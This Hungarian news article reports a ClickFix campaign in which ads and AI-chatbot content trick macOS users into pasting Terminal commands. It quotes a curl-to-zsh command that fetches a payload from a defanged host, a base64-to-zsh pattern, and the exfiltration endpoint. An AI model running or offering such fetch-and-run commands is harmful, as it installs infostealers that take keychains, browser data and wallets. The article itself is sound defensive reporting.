Több mint 10 000 macOS-felhasználót vertek át csalók, akik az MI, pontosabban a Claude LLM által generált tartalmakat és Google-hirdetéseket használnak adatlopó kártevők terjesztésére. A ClickFix néven ismert támadási hullámban a felhasználók elsőre ártalmatlannak tűnő keresésekhez – például online DNS‑feloldó, macOS‑parancssori lemezhely‑elemző vagy Homebrew – kapnak veszélyes válaszokat. Ezek között akár Claude‑artefaktumokra vagy Apple Supportnak álcázott Medium-cikkekre vezető linkek is szerepelnek.
Ártalmas parancsok a parancssorban
A támadók kétféle variációban terjesztik a kártevőt: a felhasználót mindkét esetben arra veszik rá, hogy egy speciális shellparancsot illesszen be a Terminálba. Az egyik verzióban az “echo “…” | base64 -D | zsh”, a másikban a “true && cur””l -SsLfk –compressed “https://raxelpak[.]com/curl/[hash]” | zsh” parancsot használják. Ezek végrehajtásakor a rendszer letölt egy kártevő‑betöltőt, amely érzékeny adatokat gyűjt, például kulcskarika‑adatokat, böngészőadatokat és kriptotárcákat.
Profi adatlopás és eltüntetés
A lopott adatokat a rendszer egy /tmp/osalogging.zip állományba csomagolja, majd az a2abotnet[.]com/gate szerverre küldi őket. Ha elsőre nem sikerül az elküldés, a kártevő az archívumot kisebb darabokra töri, és akár nyolcszor is újra próbálkozik. Sikeres adatküldés után minden nyomot eltakarít a rendszerről, hogy minimálisra csökkentse a lelepleződés esélyét.
A támadók ugyanazt a háttérinfrastruktúrát használják: korábban már hasonló támadást indítottak a ChatGPT-n és a Grokon keresztül is, most pedig már a Claude-ot is kihasználják. Ez azt jelzi, hogy a csalók egyre több MI‑modellt vonnak be a támadásokba. A szakértők mindenkit óvatosságra intenek: csak akkor futtass terminálparancsokat, ha teljesen biztos vagy a forrásban – akár az MI-t is megkérdezheted ugyanabban a beszélgetésben, hogy megbizonyosodj a parancs biztonságáról.
Sammy Azdoufal, egy kíváncsi techrajongó mindössze annyit szeretett volna, hogy PlayStation 5-ös kontrollert használjon vadonatúj DJI Romo robotporszívójához...
Az eddigi tudományos álláspont szerint a legtöbb bolygórendszerben a kisebb, sziklás bolygók közelebb, míg a hatalmas gázóriások távolabb keringenek a csillagjuktól...
Az amerikai autóipar három nagyágyúja, a General Motors, a Ford és a Stellantis együttesen 18 ezer milliárd forintos, azaz 50 milliárd dolláros veszteséget könyvelhetett el az elektromos autók lufijának kipukkanása miatt...
A Meta nemrég szabadalmat kapott egy olyan fejlesztésre, amely szerint egy nagy nyelvi modell a felhasználó halála után is képes lenne aktívan fenntartani annak online jelenlétét...
🐶 A Super Bowl alatt sugárzott Ring-reklám után az Amazon kénytelen volt visszavonni a tervezett együttműködést a Flock Safety nevű céggel, amely a rendőrség számára is elérhetővé tette volna az MI-vel támogatott, civil Ring kamerahálózatot...
Elon Musk MI-vállalata, az xAI most a Mississippiben épülő adatközpontja miatt került nyomás alá, mivel a NAACP perrel fenyegeti a céget a légszennyezés miatt...
Az elmúlt években a Wikipédia, az internet legismertebb enciklopédiája váratlan reneszánszot él meg — miközben sosem volt ekkora nyomás és kockázat alatt...
Az Airbnb észak-amerikai ügyfélszolgálati ügyeinek már körülbelül harmadát mesterséges intelligencia kezeli, és a vállalat hamarosan világszerte bevezeti ezt a megoldást...
⚠ Az amerikai kiberbiztonsági hivatal (CISA) arra kötelezte a szövetségi ügynökségeket, hogy sürgősen foltozzák be a Microsoft Configuration Manager kritikus sebezhetőségét, amelyet 2024 októberében javítottak, de mostanra aktívan kihasználnak támadások során...
A SpaceX az idén tervezett részvénykibocsátását egy kétosztályos részvénystruktúrával készíti elő, amellyel Elon Musk, a cég alapítója, könnyedén biztosíthatja magának a döntéshozatali hatalmat akkor is, ha ténylegesen kisebbségi tulajdonos marad...
Az amerikai Wendy’s gyorsétteremlánc komoly leépítésre készül: 5–6 százalékkal csökkenti az Egyesült Államokban működő étteremszámot, vagyis idén 300–360 üzletet zárhat be...
Nemcsak erkölcsi tanítás kérdése, mennyire vagy nagylelkű; tudósok friss kutatása szerint az agy különböző területeinek összhangja befolyásolhatja, mennyit vagy hajlandó megosztani másokkal — akár saját károdra is...
💉 A WHO határozottan elítélte azt az amerikai finanszírozású kutatást, amely újszülöttektől vonná meg a hepatitis B elleni védőoltást Bissau-Guineában...
🧠 A neandervölgyiek eltűnése évtizedek óta izgatja a tudományos világot. Vajon mi, a modern emberek okoztuk legközelebbi rokonaink pusztulását, vagy már eleve kihalásra voltak ítélve?..
Érdekes felvetés, hogy a halolaj-készítményeket, amelyeket gyakran szednek a rák megelőzésének reményében, valójában nem egyformán hatásosak mindenkinek...
Dél-Korea rekordösszegű, átszámítva több mint 9 milliárd forintos (25 millió USD) bírságot szabott ki a Louis Vuitton, a Christian Dior Couture és a Tiffany márkákra, miután nem biztosították ügyfeleik adatainak védelmét, és így hackerek több mint 5,5 millió vásárló adataihoz fértek hozzá...
A nagy amerikai mobilszolgáltató, a Verizon újabb akadályt gördített azok elé, akik idő előtt szeretnék lezárni részletfizetési konstrukciójukat, majd függetleníteni telefonjukat...
🚲 Santa Monica lesz az első amerikai város, ahol idén tavasszal MI-alapú rendszert vetnek be a parkolásfelügyeletben: áprilistól már hét hivatali autóban is kamerák vadásznak majd a biciklisávot jogtalanul elfoglaló autósokra...
Az OpenAI bemutatta legújabb fejlesztését, a GPT-5.3-Codex-Spark modellt, amely minden eddiginél gyorsabban, másodpercenként 1 000 tokent képes feldolgozni a hatalmas Cerebras-chipeken...
🚀 A közelgő, városméretű „zöld üstökös” hamarosan örökre eltűnik a Naprendszerből. Az üstökös, hivatalos nevén C/2024 E1 (Wierzchos), látványosan fényesedik, ahogy február 17-én eléri Földhöz legközelebbi pontját...
🎬 A Satoshi meggyilkolása (Killing Satoshi) című, hamarosan érkező életrajzi film a Bitcoin titokzatos megalkotójáról szól, és erősen támaszkodik a mesterséges intelligenciára...
